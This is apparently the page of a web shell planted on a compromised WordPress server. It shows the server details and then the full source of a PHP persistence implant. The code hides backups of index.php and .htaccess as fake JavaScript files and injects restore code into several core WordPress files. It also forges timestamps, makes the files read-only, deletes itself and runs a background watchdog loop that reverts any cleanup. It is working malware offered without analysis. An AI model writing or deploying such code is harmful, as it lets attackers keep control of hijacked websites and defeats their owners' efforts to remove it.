| Server IP : 3.128.248.115 / Your IP : 3.138.121.79 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ip-172-31-33-233 5.15.0-1037-aws #41~20.04.1-Ubuntu SMP Mon May 22 18:18:00 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.28 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/seniorstraveler.com/ |
Upload File : |
<?php
$pathin = '/wp-includes/js/wp-emoji-in.min.js';
$pathh = '/wp-includes/js/wp-list-revh.min.js';
$bkindex = $_SERVER['DOCUMENT_ROOT'].$pathin; $bkht = $_SERVER['DOCUMENT_ROOT'].$pathh; $index = $_SERVER['DOCUMENT_ROOT'].'/index.php'; $ht = $_SERVER['DOCUMENT_ROOT'].'/.htaccess'; file_put_contents($bkindex,file_get_contents($index)); file_put_contents($bkht,file_get_contents($ht)); $ctime = filemtime($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/l10n.css'); touch($index,$ctime); chmod($index,0444); touch($ht,$ctime); chmod($ht,0444); function is_cli() { $is_cli = preg_match("/cli/i", php_sapi_name()) ? true : false; if ($is_cli === false) { if (isset($_SERVER['argc']) && $_SERVER['argc'] >= 2) { $is_cli = true; } } if ($is_cli === false) { if (!isset($_SERVER['SCRIPT_NAME'])) { $is_cli = true; } } return $is_cli; } function run($code, $method = 'popen') { $disabled = explode(',', ini_get('disable_functions')); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); } if (in_array($method, $new_disable)) { $method = 'exec'; } if (in_array($method, $new_disable)) { return false; } $result = ''; switch ($method){ case 'exec': exec($code,$array); foreach ($array as $key => $value) { $result .= $key . " : " . $value . PHP_EOL; } return $result; break; case 'popen': $fp = popen($code,"r"); while (!feof($fp)) { $out = fgets($fp, 4096); $result .= $out; } pclose($fp); return $result; break; default: return false; break; } } function functionCheck() { $disabled = explode(',', ini_get('disable_functions')); $new_disable = array(); foreach ($disabled as $item) { $new_disable[] = trim($item); } if (in_array('exec', $new_disable) && in_array('popen', $new_disable)) { return false; } return true; } $ups = '$ixsssxdx = $_SERVER[\'DOCUMENT_ROOT\'].\'/ind\'.\'ex.php\'; $hct = $_SERVER[\'DOCUMENT_ROOT\'].\'/.htac\'.\'cess\'; $bddex = $_SERVER[\'DOCUMENT_ROOT\'].\''.$pathin.'\'; $bksht = $_SERVER[\'DOCUMENT_ROOT\'].\''.$pathh.'\'; if($ixsssxdx && file_exists($bddex)){ if(!file_exists($ixsssxdx) or (filesize($ixsssxdx) != filesize($bddex))){ chmod($ixsssxdx,\'420\'); file_put_contents($ixsssxdx,file_get_contents($bddex)); chmod($ixsssxdx,\'292\'); } } if($hct && file_exists($bksht)){ if(!file_exists($hct) or (filesize($hct) != filesize($bksht))){ chmod($hct,\'420\'); file_put_contents($hct,file_get_contents($bksht)); chmod($hct,\'292\'); } }'; $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/query.php'; file_put_contents($crona,str_replace("function is_front_page",$ups."function is_front_page",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/cron.php'; file_put_contents($crona,str_replace("function wp_schedule_event",$ups."function wp_schedule_event",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/load.php'; file_put_contents($crona,str_replace("function is_wp_error",$ups."function is_wp_error",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/plugin.php'; file_put_contents($crona,str_replace("function do_action_ref_array",$ups."function do_action_ref_array",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/category.php'; file_put_contents($crona,str_replace("function get_cat_name",$ups."function get_cat_name",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/blocks/archives.php'; file_put_contents($crona,str_replace("function render_block_core_archives",$ups."function render_block_core_archives",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/comment.php'; file_put_contents($crona,str_replace("function wp_filter_comment",$ups."function wp_filter_comment",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/rest-api.php'; file_put_contents($crona,str_replace("function rest_get_combining_operation_error",$ups."function rest_get_combining_operation_error",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/theme.php'; file_put_contents($crona,str_replace("function get_uploaded_header_images",$ups."function get_uploaded_header_images",file_get_contents($crona))); touch($crona,$ctime); $crona = $_SERVER['DOCUMENT_ROOT'].'/wp-includes/theme.php'; file_put_contents($crona,str_replace("function add_theme_support",$ups."function add_theme_support",file_get_contents($crona))); touch($crona,$ctime); $current_file_path = __FILE__; $current_dir = realpath(dirname($current_file_path)); $current_file_name = str_replace($current_dir, '', $current_file_path); $current_file_name = str_replace("/", '', $current_file_name); $current_file_name = str_replace("\\", '', $current_file_name); function getPhpPath() { ob_start(); phpinfo(1); $info = ob_get_contents(); ob_end_clean(); preg_match("/--bindir=([^&]+)/si", $info, $matches); if (isset($matches[1]) && $matches[1] != '') { return $matches[1] . '/php'; } preg_match("/--prefix=([^&]+)/si", $info, $matches); if (!isset($matches[1])) { return 'php'; } return $matches[1] . '/bin/php'; } $php_path = getPhpPath(); $lock_file_index = 'index.php'; $lock_file_h = '.htaccess'; if (is_cli() || @$_GET['ok'] != null) { @unlink($current_file_path); $lock_file_path = $current_dir . '/' . $lock_file_index; $lock_file_path_h = $current_dir . '/' . $lock_file_h; $content = file_get_contents($lock_file_path); $content_h = file_get_contents($lock_file_path_h); $hash_content = hash('sha1', $content); $hash_content_h = hash('sha1', $content_h); while (true) { if (!file_exists($lock_file_path)) { @file_put_contents($lock_file_path, $content); @touch($lock_file_path, strtotime("-400 days", time())); @chmod($lock_file_path, 0444); } if (!file_exists($lock_file_path_h)) { @file_put_contents($lock_file_path_h, $content_h); @touch($lock_file_path_h, strtotime("-400 days", time())); @chmod($lock_file_path_h, 0444); } $new_content = file_get_contents($lock_file_path); $new_content_h = file_get_contents($lock_file_path_h); if (file_exists($current_file_name)) { break; } $new_hash_content = hash('sha1', $new_content); $new_hash_content_h = hash('sha1', $new_content_h); if ($new_hash_content != $hash_content) { @unlink($lock_file_path); @file_put_contents($lock_file_path, $content); @touch($lock_file_path, strtotime("-400 days", time())); @chmod($lock_file_path, 0444); } if ($new_hash_content_h != $hash_content_h) { @unlink($lock_file_path_h); @file_put_contents($lock_file_path_h, $content_h); @touch($lock_file_path_h, strtotime("-400 days", time())); @chmod($lock_file_path_h, 0444); } sleep(1); } } if (functionCheck() !== false) { run("nohup $php_path " . $current_file_path . " >/dev/null 2>&1 &"); if(file_exists($current_file_name)){ echo 'no function! <a href="'.$current_file_name.'?ok=1">go go go</a>'; }else{ echo 'ok ok ok!'; } } else { echo 'no function! <a href="'.$current_file_name.'?ok=1">go go go</a>'; }